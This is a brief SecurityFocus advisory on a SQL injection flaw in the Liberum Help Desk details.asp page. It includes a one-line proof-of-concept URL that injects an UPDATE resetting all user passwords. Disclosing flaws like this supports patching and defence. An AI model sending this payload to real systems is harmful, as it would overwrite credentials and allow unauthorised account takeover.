Liberum Help Desk DETAILS.ASP SQL Injection Vulnerability

Attackers can exploit this issue via a web client.

A proof of concept is available:

http://www.example.com/details.asp?id=2)%20update%20tblusers%20set%20password='kro'--


 

Privacy Statement
Copyright 2010, SecurityFocus